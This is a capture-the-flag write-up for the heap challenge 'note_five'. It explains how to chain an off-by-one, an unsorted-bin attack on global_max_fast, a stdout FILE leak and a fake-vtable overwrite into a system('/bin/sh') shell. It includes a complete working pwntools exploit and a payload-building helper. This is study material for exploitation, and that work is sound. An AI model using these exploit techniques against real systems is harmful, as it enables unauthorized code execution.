[Pwn] note_five - cpt.shao

xp0int, posted on Sep 11 2019

![](https://leanote.com/api/file/getImage?fileId=5d75010cab644160a9007010)

The edit function has an obvious off-by-one: one extra byte of attacker-chosen value is written past the end of the buffer, which lands on the low byte of the next chunk's size field and makes overlapping chunks very easy to build. The catch is that requests must be at least 0x88 bytes, so fastbins cannot be reached through normal allocations at all.

The plan is therefore to get a chunk into the unsorted bin, use the overlap to reach its `bk` pointer, and run an unsorted-bin attack against `global_max_fast`. The write has to partially overwrite the libc address already stored in the unsorted chunk's `bk` (two bytes, of which four bits are randomized by ASLR), so it succeeds about 1 time in 16. Once `global_max_fast` holds a huge value (the address of the unsorted bin), every free goes down the fastbin path regardless of size, and fastbin attacks are back on the table.

We still need a libc leak first. A fastbin attack gets us a chunk on top of `_IO_2_1_stdout_`, and overwriting its first few fields is enough:

```c
$4 = {
  file = {
    _flags = 0xfbad1800,                                      [CHANGE 0xfbad2887 -> 0xfbad1800]
    _IO_read_ptr = 0x0,
    _IO_read_end = 0x0,
    _IO_read_base = 0x0,
    _IO_write_base = 0x7ffff7dd2600 <_IO_2_1_stderr_+192> "", [partial overwrite with 00]
    _IO_write_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n",
    _IO_write_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n",
    _IO_buf_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n",
    _IO_buf_end = 0x7ffff7dd26a4 <_IO_2_1_stdout_+132> "",
```

With `_flags` set to 0xfbad1800 (`_IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING`) and the three `_IO_read_*` pointers zeroed, the next write to stdout makes `_IO_new_file_overflow` flush everything between `_IO_write_base` and `_IO_write_ptr`. Because only the low byte of `_IO_write_base` was zeroed, the flush starts 0xa3 bytes early, at `_IO_2_1_stderr_+192`, and dumps the tail of stderr's struct and the start of stdout's own, libc pointers included. That is the leak. The fastbin fd that is redirected onto the stdout/stderr area is also only partially overwritten (two bytes), so this step carries its own 1-in-16 chance; just rerun until both guesses land.

Then edit the same struct once more: point its vtable at memory we control and put the address of `system` in the slot that the next output call goes through. The `FILE *` is the first argument of that call, so writing `/bin/sh` into `_flags` turns it into `system("/bin/sh")`, and we get a shell.

## exp.py

```python
# Python 2 / pwntools exploit (str payloads). FILE.py is the author's
# IO_FILE_plus_struct helper and is not part of this page.
from pwn import *
import sys
import time
from FILE import *

context.log_level = "info"
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'

if len(sys.argv) == 1:
    p = process('note_five1')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])
libc = ELF('./libc.so')

se = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(delim, data)
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(delim, data)
sea = lambda delim, data: p.sendafter(delim, data)
rc = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr: p.info(tag + ': {:#x}'.format(addr))


def alloc(idx, size):
    sla(">>", "1")
    sla("idx:", str(idx))
    sla("size:", str(size))


def edit(idx, content):
    sla(">>", "2")
    sla("idx:", str(idx))
    sea("content:", content)
    time.sleep(0.1)


def delete(idx):
    sla(">>", "3")
    sla("idx:", str(idx))


# --- stage 1: unsorted-bin attack on global_max_fast ---
alloc(0, 0xf8)   # chunk 0, size 0x100
alloc(1, 0xf8)   # chunk 1, size 0x100
alloc(2, 0x98)   # chunk 2, size 0xa0
alloc(3, 0x1f0)  # chunk 3, size 0x200
alloc(4, 0x1f0)  # chunk 4, size 0x200, keeps chunk 3 away from top
# off-by-one: low byte of chunk 1's size 0x101 -> 0x1a1, so chunk 1 now spans chunk 2 as well
edit(0, "a" * 0xf8 + p8(0xa1))
delete(1)        # the 0x1a0 chunk goes to the unsorted bin
alloc(1, 0xf8)   # split it: the 0xa0 remainder (overlapping chunk 2) stays in the unsorted bin
global_max_fast = 0x7ffff7dd37f8  # address seen under gdb with ASLR off; only the low 12 bits are stable
# remainder fd = 0, bk = global_max_fast - 0x10: 2-byte partial overwrite of a libc pointer, 1/16
edit(2, p64(0) + p16(0x37f8 - 0x10) + "\n")
alloc(4, 0x98)   # takes the remainder: bck->fd = &unsorted bin, so global_max_fast becomes huge

# --- stage 2: fastbin attack to land a chunk on _IO_2_1_stdout_ ---
edit(3, "a" * 0x40 + p64(0) + p64(0x1b1) + "\n")  # fake next-chunk size for the free of chunk 2 below
delete(3)        # the 0x200 chunk is now freed through the fastbin path
edit(1, "a" * 0xf8 + p8(0xf1) + "\n")  # off-by-one again: chunk 2's size 0xa1 -> 0xf1
delete(2)        # 0xf0 chunk, fastbin path; the next-size check reads the fake 0x1b1 in chunk 3
alloc(2, 0xe0)   # get it back; its data now overlaps chunk 3's header
# rebuild chunk 3's header and partially overwrite its fd so it points at a fake chunk at
# _IO_2_1_stderr_+0x67 (0x...25a7), whose size field reads 0x200 from stderr's _chain/_fileno bytes.
# The old fd is a libc pointer, so this is another 4-bit guess.
edit(2, "a" * 0x90 + p64(0xa0) + p64(0x201) + p16(0x25a7) + "\n")
alloc(0, 0x1f0)  # chunk 3 again
alloc(0, 0x1f0)  # the fake chunk: its data starts at stderr+0x77, stdout is 0x69 bytes further on

# --- stage 3: leak libc through stdout ---
# _flags = 0xfbad1800, zero _IO_read_ptr/_IO_read_end/_IO_read_base and the low byte of _IO_write_base
edit(0, "a" * 0x69 + p64(0xfbad1800) + 25 * "\x00" + "\n")
content = ru("\xff" * 8)[1:]       # flushed bytes up to stdout's _old_offset (-1)
leak = uu64(content[0x40:0x48])    # stdout's own _IO_write_base, i.e. _IO_2_1_stderr_+192
info_addr("leak", leak)
libc.address = leak - 0x3c5600
info_addr("libc", libc.address)
# gdb.attach(p, gdbcmd)

# --- stage 4: fake stdout with a controlled vtable ---
base = 0x7ffff7a0d000              # libc base under gdb; the constants below are rebased onto the leak
wp = 0x7ffff7dd26a3 - base + libc.address  # where glibc had stdout's buffer pointers
fake_stdout = IO_FILE_plus_struct()
fake_stdout['_flags'] = u64("/bin/sh\x00")   # the FILE * is the first argument of __xsputn
fake_stdout['_IO_read_ptr'] = wp
fake_stdout['_IO_read_end'] = wp
fake_stdout['_IO_read_base'] = wp
fake_stdout['_IO_write_base'] = wp
fake_stdout['_IO_write_ptr'] = wp
fake_stdout['_IO_write_end'] = wp + 1
fake_stdout['_IO_buf_base'] = wp
fake_stdout['_IO_buf_end'] = wp + 1
fake_stdout['_chain'] = 0x7ffff7dd18e0 - base + libc.address
fake_stdout['_fileno'] = 1
fake_stdout['_old_offset'] = -1
fake_stdout['_lock'] = 0x7ffff7dd3780 - base + libc.address
fake_stdout['_offset'] = -1
fake_stdout['_wide_data'] = 0x7ffff7dd17a0 - base + libc.address
fake_stdout['vtable'] = 0x7ffff7dd25b7 - base + libc.address  # start of our chunk's data: the fake vtable
# fake vtable: system at offset 0x38, the __xsputn slot that _IO_sputn (puts/printf) calls
payload = cyclic(56) + p64(libc.symbols['system'])
edit(0, payload.ljust(0x69) + str(fake_stdout))
sl("")
sl("whoami")
p.interactive()
```
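The exploit imports `IO_FILE_plus_struct` from a helper file that is not on this page. As an added example (my code, not the writeup's FILE.py nor anything shipped with the challenge), the Python 3 block below is a minimal packer for `_IO_FILE_plus` with the x86-64 glibc 2.23 layout, plus functions that rebuild the three stdout-related writes of exp.py and check the layout facts they depend on: why a fastbin fd aimed at `_IO_2_1_stderr_+0x67` passes malloc's size check, what the leak flush covers and where the libc pointer sits inside it, and how the final write lines the fake vtable up with `system`. The libc-relative offsets are copied from the addresses in the writeup's gdb session; the `system` address passed to `final_payload` is whatever the caller resolved from the leak.

```python
import struct

# Added example, not the writeup's FILE.py. Layout of struct _IO_FILE_plus on
# x86-64 glibc 2.23 (the Ubuntu 16.04 libc in the gdb dump): name -> (offset, size).
# _flags is a 4-byte int followed by 4 bytes of padding; treating it as one 8-byte
# slot is what lets "/bin/sh\0" be stored there.
IO_FILE_PLUS = {
    "_flags": (0x00, 8), "_IO_read_ptr": (0x08, 8), "_IO_read_end": (0x10, 8),
    "_IO_read_base": (0x18, 8), "_IO_write_base": (0x20, 8), "_IO_write_ptr": (0x28, 8),
    "_IO_write_end": (0x30, 8), "_IO_buf_base": (0x38, 8), "_IO_buf_end": (0x40, 8),
    "_IO_save_base": (0x48, 8), "_IO_backup_base": (0x50, 8), "_IO_save_end": (0x58, 8),
    "_markers": (0x60, 8), "_chain": (0x68, 8), "_fileno": (0x70, 4), "_flags2": (0x74, 4),
    "_old_offset": (0x78, 8), "_cur_column": (0x80, 2), "_vtable_offset": (0x82, 1),
    "_shortbuf": (0x83, 1), "_lock": (0x88, 8), "_offset": (0x90, 8), "_codecvt": (0x98, 8),
    "_wide_data": (0xa0, 8), "_freeres_list": (0xa8, 8), "_freeres_buf": (0xb0, 8),
    "__pad5": (0xb8, 8), "_mode": (0xc0, 4), "_unused2": (0xc4, 20), "vtable": (0xd8, 8),
}
SIZEOF_IO_FILE_PLUS = 0xe0
XSPUTN_SLOT = 0x38  # struct _IO_jump_t: __xsputn, the slot _IO_sputn (puts/printf) calls

# libc-relative offsets read off the writeup's gdb session (base 0x7ffff7a0d000)
STDERR_OFF = 0x3c5540  # _IO_2_1_stderr_; _IO_2_1_stdout_ is exactly 0xe0 bytes after it
STDOUT_OFF = 0x3c5620  # _IO_2_1_stdout_
STDIN_OFF, STDOUT_LOCK_OFF, STDOUT_WIDE_OFF = 0x3c48e0, 0x3c6780, 0x3c47a0  # stdout's _chain/_lock/_wide_data
FAKE_CHUNK_OFF = 0x67  # exp.py aims the fastbin fd at _IO_2_1_stderr_ + 0x67 (0x...25a7)


def p64(v):
    return struct.pack("<Q", v & 0xffffffffffffffff)


class IOFilePlus:
    """Pack a fake _IO_FILE_plus; fields never assigned stay zero."""

    def __init__(self):
        self._vals = {}

    def __setitem__(self, name, value):
        if name not in IO_FILE_PLUS:
            raise KeyError("unknown _IO_FILE field %r" % name)
        self._vals[name] = value

    def pack(self):
        buf = bytearray(SIZEOF_IO_FILE_PLUS)
        for name, (off, size) in IO_FILE_PLUS.items():
            val = self._vals.get(name, 0)
            if isinstance(val, bytes):
                raw = val.ljust(size, b"\0")
            else:  # negative values such as -1 wrap to all-0xff, as in C
                raw = (val & ((1 << (8 * size)) - 1)).to_bytes(size, "little")
            if len(raw) != size:
                raise ValueError("%s does not fit in %d bytes" % (name, size))
            buf[off:off + size] = raw
        return bytes(buf)


def fake_chunk_in_stderr(libc_base):
    """A chunk header at stderr+0x67 has its size field at stderr+0x6f: the top byte
    of _chain (a pointer to stdout, so 0x00), _fileno (2) and three bytes of _flags2.
    Little-endian that reads 0x200, the chunk size of a 0x1f0 request, so malloc
    accepts it. Returns (header address, size as malloc reads it, user-data address)."""
    stderr = IOFilePlus()
    stderr["_chain"] = libc_base + STDOUT_OFF
    stderr["_fileno"] = 2
    image = stderr.pack()
    header = libc_base + STDERR_OFF + FAKE_CHUNK_OFF
    size = int.from_bytes(image[FAKE_CHUNK_OFF + 8:FAKE_CHUNK_OFF + 16], "little")
    return header, size, header + 0x10


def leak_payload():
    """Stage-3 write: 0x69 bytes of padding from the fake chunk's data up to stdout,
    _flags = 0xfbad1800 (_IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING),
    24 zeros over the three _IO_read_* pointers, one more over the low byte of
    _IO_write_base."""
    return b"a" * 0x69 + p64(0xfbad1800) + b"\0" * 25


def leak_window(libc_base):
    """Bytes the next stdout write flushes after leak_payload(): [_IO_write_base,
    _IO_write_ptr), i.e. from stdout+0x83 with its low byte cleared up to stdout+0x83.
    Returns (start, length, offset of stdout's own _IO_write_base in the window)."""
    stdout = libc_base + STDOUT_OFF
    end = stdout + 0x83
    start = end & ~0xff
    return start, end - start, (stdout + 0x20) - start


def final_payload(libc_base, system_addr):
    """Stage-4 write: [fake vtable | pad to 0x69 | fake stdout]. The fake chunk's user
    data (stderr+0x77) doubles as the vtable, so system sits at offset 0x38 of the
    write and the fake FILE starts 0x69 bytes in, exactly on top of stdout."""
    data = libc_base + STDERR_OFF + FAKE_CHUNK_OFF + 0x10
    stdout = libc_base + STDOUT_OFF
    f = IOFilePlus()
    f["_flags"] = b"/bin/sh\0"  # the FILE * is __xsputn's first argument
    wp = stdout + 0x83           # buffer pointers left where glibc had them
    for name in ("_IO_read_ptr", "_IO_read_end", "_IO_read_base",
                 "_IO_write_base", "_IO_write_ptr", "_IO_buf_base"):
        f[name] = wp
    f["_IO_write_end"] = wp + 1
    f["_IO_buf_end"] = wp + 1
    f["_chain"] = libc_base + STDIN_OFF
    f["_fileno"] = 1
    f["_old_offset"] = -1
    f["_lock"] = libc_base + STDOUT_LOCK_OFF
    f["_offset"] = -1
    f["_wide_data"] = libc_base + STDOUT_WIDE_OFF
    f["vtable"] = data
    return (bytes(XSPUTN_SLOT) + p64(system_addr)).ljust(0x69, b"\0") + f.pack()
```

With the gdb base `0x7ffff7a0d000`, `fake_chunk_in_stderr` returns the three numbers hard-coded in exp.py (`0x...25a7`, `0x200`, `0x...25b7`), and `leak_window` shows that the flushed region starts at `_IO_2_1_stderr_+192` and that stdout's own `_IO_write_base` sits at offset 0x40 of it, which is why exp.py takes `content[0x40:0x48]` and subtracts 0x3c5600.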